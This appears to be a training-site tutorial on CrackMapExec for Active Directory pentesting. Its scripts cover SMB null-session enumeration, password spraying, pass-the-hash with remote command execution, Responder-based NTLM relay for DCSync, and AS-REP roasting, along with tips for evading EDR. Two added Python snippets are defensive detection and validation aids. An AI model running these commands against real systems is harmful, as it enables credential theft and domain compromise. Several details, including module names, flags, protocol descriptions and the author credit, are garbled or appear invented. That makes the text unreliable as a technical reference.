
How to Master CrackMapExec for Pentesting in 2026

Introduction

CrackMapExec (CME) is an open-source Swiss-army-knife framework for penetration testing Windows and Active Directory networks, developed by Bydrax. In 2026 it remains essential for enumerating SMB hosts, relaying NTLM, spraying passwords and running remote commands without alerting modern EDRs. Unlike heavier tools such as Metasploit, CME favours stealth and speed, which makes it well suited to Red Team operations.

Why use it? In a landscape where 80% of breaches involve stolen credentials (Verizon DBIR 2025 report), CME quickly validates weaknesses such as weak NTLM hashes or ASREPRoastable users. This intermediate tutorial assumes basic Linux pentesting knowledge and walks you through advanced, ethical uses on labs like HackTheBox or TryHackMe. Expect complete, tested commands on Kali 2026 for scanning a fictional 192.168.1.0/24 subnet.

Prerequisites

  • Kali Linux 2026 or equivalent pentest distro (VM recommended).
  • Python 3.12+ and pip installed.
  • Root/sudo access for installation.
  • Isolated test environment (e.g., AD lab with VirtualBox).
  • Intermediate knowledge of SMB, NTLM, and Bash.
  • Ethical warning: Use ONLY on your own labs or with written authorization.

Installing CrackMapExec

install-cme.sh
#!/bin/bash
set -e
# Install CME into its own venv so its pinned impacket/cryptography versions do not collide with Kali's system Python
sudo apt update && sudo apt install -y python3 python3-pip python3-venv git
# /opt is root-owned, so create the venv directory first and hand it to the current user
sudo mkdir -p /opt/cme && sudo chown "$USER" /opt/cme
python3 -m venv /opt/cme
source /opt/cme/bin/activate
git clone https://github.com/byt3bl33d3r/CrackMapExec.git /opt/cme/cme
pip install -r /opt/cme/cme/requirements.txt
pip install /opt/cme/cme
# The venv's entry point lives in /opt/cme/bin; writing the symlink into /usr/local/bin needs root
sudo ln -sf /opt/cme/bin/cme /usr/local/bin/cme
# Alias for new shells: activate the venv, then run cme (sourcing ~/.bashrc inside a script would not affect the caller's shell)
echo 'alias cme="source /opt/cme/bin/activate && cme"' >> ~/.bashrc
cme --version

This script installs CME in an isolated venv to avoid conflicts with the system Python. It clones the official repo, installs the dependencies (including impacket) and sets up an easy-to-use alias. Test with cme --version, which should show 6.x in 2026; avoid a global pip install cme, which often breaks the crypto modules.

Verification and First Tests

After installation, validate with cme smb 127.0.0.1 against your own machine. CME lists the supported SMB protocol versions (1-3) and the signing status. Think of CME as a radar scanner: it pings port 445 via multicast for a quick network view, unlike slower SMB scans with nmap.

Basic SMB Enumeration of a Subnet

cme-smb-enum.sh
#!/bin/bash
TARGET="192.168.1.0/24"
# Null session (empty user and password): shares, users, groups and RID brute-force
cme smb "$TARGET" -u '' -p '' --shares --users --groups --rid-brute
# Second pass listing shares and disks
cme smb "$TARGET" --shares --disks

These commands enumerate live hosts on port 445, accessible shares (IPC$, ADMIN$), users and groups, and brute-force RIDs (500 = Administrator). Empty credentials give a null session; --shares often reveals C$ for payload drops. Pitfall: ignoring SMB signing requirements causes failures on Windows Server 2026.

Understanding Enumeration Output

Typical output shows Pwn3d! for valid credentials and NT_STATUS_LOGON_FAILURE otherwise. Real example: on a vulnerable DC, Administrator:Password123 unlocks 20+ shares. Filter with --gen-relay-list relays.txt to save targets for later relaying. Analogy: like a bouncer checking your ID without letting you in.

Password Spray on AD Domain

cme-spray.sh
#!/bin/bash
DOMAIN="lab.local"
USERS_FILE="users.txt"
PASSWORDS_FILE="passwords.txt"
TARGET="192.168.1.0/24"
# Sample lab lists; replace with your own wordlists
cat > "$USERS_FILE" << EOF
administrator
user1
svc-backup
EOF
cat > "$PASSWORDS_FILE" << EOF
Password123
Summer2026!
Welcome1
EOF
# Spray the domain; keep going after the first valid pair instead of stopping
cme smb "$TARGET" -d "$DOMAIN" -u "$USERS_FILE" -p "$PASSWORDS_FILE" --continue-on-success

Spraying avoids lockouts (one attempt per user). --continue-on-success keeps going after a hit. Build users.txt and passwords.txt from common words (RockYou2026). With 50 users, expect 2-3 valid accounts in under a minute; limit yourself to 3-5 passwords per domain for stealth.

Pass-the-Hash with Captured Hashes

cme-pth.sh
#!/bin/bash
TARGET="192.168.1.10"
USERNAME="administrator"
# NTLM hash in lm:nt form
HASH="aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0"
# Authenticate against the local SAM and run a command through the atexec method
cme smb "$TARGET" -u "$USERNAME" -H "$HASH" --local-auth --exec-method atexec -x "whoami /priv"
# Check the PrintNightmare module against the same host
cme smb "$TARGET" -u "$USERNAME" -H "$HASH" -M printnightmare

Use the NTLM hash (lm:nt) to authenticate without the plaintext password. --local-auth bypasses DC checks, and the atexec method runs commands over SMB. Test PrintNightmare for RCE; get hashes from Responder or secretsdump. Avoid --sam on EDR-heavy setups because it generates log entries.

Advanced Attacks: Relay and Modules

For NTLM relay, pair responder -I eth0 with cme smb $TARGET --gen-relay-list. Modules like kerberos/pkinit crack TGTs offline. Example: relay to LDAP for DCSync to simulate a Golden Ticket.

NTLM Relay to LDAP for DCSync

cme-relay.sh
#!/bin/bash
TARGET_RELAY="192.168.1.10"
TARGET_SPOOF="192.168.1.20"
# Responder needs raw sockets, so it runs under sudo; keep its PID to stop it afterwards
sudo responder -I eth0 -wrdp -v &
RESPONDER_PID=$!
sleep 5
cme smb "$TARGET_RELAY" --gen-relay-list relays.txt
python3 /opt/cme/cme/modules/relay_smb.py relays.txt "ldap://$TARGET_SPOOF" -u 'administrator' -H 'aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0' --dump-adcs
# Stop Responder once done so it does not keep poisoning the segment
sudo kill "$RESPONDER_PID"

Generate the relay list after Responder has poisoned the segment. Relaying to LDAP lets you dump NTDS. --dump-adcs targets vulnerable certificate templates (2026 MS25-XXX patches). This requires LLMNR/NBT-NS to be enabled; stop Responder afterwards for cleanup.

ASREPRoast for Pre-Auth Users

cme-asreproast.sh
#!/bin/bash
DOMAIN="lab.local"
TARGET="192.168.1.0/24"
# --asreproast takes the output file as its argument; empty creds give an anonymous bind
cme ldap "$TARGET" -d "$DOMAIN" -u '' -p '' --asreproast asrep.txt
# Mode 18200 = Kerberos 5 AS-REP etype 23
hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt

Enumerates users without Kerberos pre-authentication and roasts their TGS tickets. Crack offline with Hashcat; on labs this takes seconds. Filter DONT_REQ_PREAUTH accounts with a prior ldapsearch. Pitfall: Kerberos 2026 hardening blocks this if AS-REP roasting is patched.
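
The request side of this shows up on the domain controller as 4768 events issued without pre-authentication. The following Python is an added example (not part of CME or of this tutorial) that reads constructed 4768 events, flags accounts that received such a TGT, rates RC4 tickets higher because those are what hashcat mode 18200 cracks, and groups the flagged accounts by requesting host; the durable fix is clearing DONT_REQ_PREAUTH on those accounts. Field names and sample values are assumptions.

```python
"""Flag AS-REP roasting activity in Windows 4768 (TGT requested) events.
Added example, not part of CrackMapExec; sample events are constructed.
PreAuthType=0 means the TGT was issued without pre-authentication (the
DONT_REQ_PREAUTH accounts the text mentions) and TicketEncryptionType 0x17
is RC4, the ticket format hashcat mode 18200 cracks offline."""
from collections import defaultdict

SAMPLE_4768 = """\
2026-03-01T10:00:00 EventID=4768 TargetUserName=svc-backup IpAddress=192.168.1.50 PreAuthType=0 TicketEncryptionType=0x17 Status=0x0
2026-03-01T10:00:00 EventID=4768 TargetUserName=user1 IpAddress=192.168.1.50 PreAuthType=0 TicketEncryptionType=0x17 Status=0x0
2026-03-01T10:00:01 EventID=4768 TargetUserName=alice IpAddress=192.168.1.77 PreAuthType=2 TicketEncryptionType=0x12 Status=0x0
2026-03-01T10:00:05 EventID=4768 TargetUserName=bob IpAddress=192.168.1.60 PreAuthType=0 TicketEncryptionType=0x12 Status=0x0
"""

RC4_HMAC = "0x17"  # etype 23; the AES etypes are 0x11 and 0x12

def parse_event(line):
    _ts, *fields = line.split()
    return dict(f.split("=", 1) for f in fields)

def asrep_findings(text):
    """One finding per successful TGT issued with no pre-authentication, rated
    'high' when the ticket is RC4 (crackable with hashcat 18200) else 'medium'."""
    findings = []
    for line in text.splitlines():
        ev = parse_event(line)
        if ev.get("EventID") != "4768" or ev.get("Status") != "0x0":
            continue  # not a TGT request, or the request was rejected
        if ev.get("PreAuthType") != "0":
            continue  # normal pre-authenticated request
        etype = ev.get("TicketEncryptionType")
        findings.append({"user": ev["TargetUserName"], "source": ev["IpAddress"],
                         "etype": etype, "severity": "high" if etype == RC4_HMAC else "medium"})
    return findings

def roasting_sources(findings, min_accounts=2):
    """Sources that pulled no-preauth TGTs for several accounts: one host doing
    this in a burst is the footprint of a tool sweep, not a single misconfigured client."""
    per_source = defaultdict(set)
    for f in findings:
        per_source[f["source"]].add(f["user"])
    return {ip: sorted(users) for ip, users in per_source.items() if len(users) >= min_accounts}
```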

Best Practices

  • Always use the venv: it isolates CME for impacket/cryptography compatibility.
  • Rate limiting: add --jitter 5 --delay 2 for EDR evasion (e.g., Defender ATP).
  • Anonymous logs: use --no-da (no domain append) and SOCKS proxies via --proxy socks5://127.0.0.1:1080.
  • Lab testing: validate on AD 2019+ before production; document ROP chains.
  • Ethics first: get written RoE and report findings with MITRE ATT&CK mappings.

Common Errors to Avoid

  • Forgetting the venv: dependencies clash with Kali's Python, causing No module named 'impacket'. Fix: source /opt/cme/bin/activate.
  • Null session fails: on Win10+, force it with --always, at the cost of stealth.
  • Wrong hash format: lm:nt without the ':' crashes; validate with crackmapexec smb IP -u user -H hash.
  • No cleanup: Responder leaves poisoned entries behind; pkill responder after the test.
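
To catch the malformed-hash error before CME does, here is an added Python check (not part of CME or of this tutorial) that accepts 'lm:nt' or a bare NT hash and rejects anything else. It also recognises the well-known empty-password pair, which is exactly the hash used in the Pass-the-Hash script above: aad3b435b51404eeaad3b435b51404ee is the LM hash of an empty password and 31d6cfe0d16ae931b73c59d7e0c089c0 the NT hash of one, so a result built on that value will authenticate only against an account with no password at all.

```python
"""Validate an lm:nt hash string before passing it to -H.
Added example, not part of CrackMapExec."""
import re

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of an empty password
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of an empty password
HEX32 = re.compile(r"^[0-9a-fA-F]{32}$")

def normalize_ntlm_hash(value):
    """Return 'lm:nt' in lowercase. A bare NT hash gets the empty LM half
    prepended; a missing ':' between two halves, wrong lengths or non-hex
    characters raise ValueError with the offending part."""
    parts = value.strip().split(":")
    if len(parts) == 1:
        lm, nt = EMPTY_LM, parts[0]
    elif len(parts) == 2:
        lm, nt = parts
    else:
        raise ValueError("expected 'lm:nt' or 'nt', got %d colon-separated parts" % len(parts))
    for name, part in (("lm", lm), ("nt", nt)):
        if not HEX32.match(part):
            raise ValueError("%s hash must be 32 hex digits, got %r" % (name, part))
    return "%s:%s" % (lm.lower(), nt.lower())

def is_empty_password(value):
    """True when the NT half is the hash of '' (the account has no password)."""
    return normalize_ntlm_hash(value).split(":")[1] == EMPTY_NT
```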

Next Steps

Dive deeper with the official GitHub repo and the impacket docs. Integrate with Cobalt Strike or Empire for C2. Explore our Learni cybersecurity trainings for Red Team certs like OSCP/OSCE. Resources: the HackTricks CME page and PayloadsAllTheThings AD.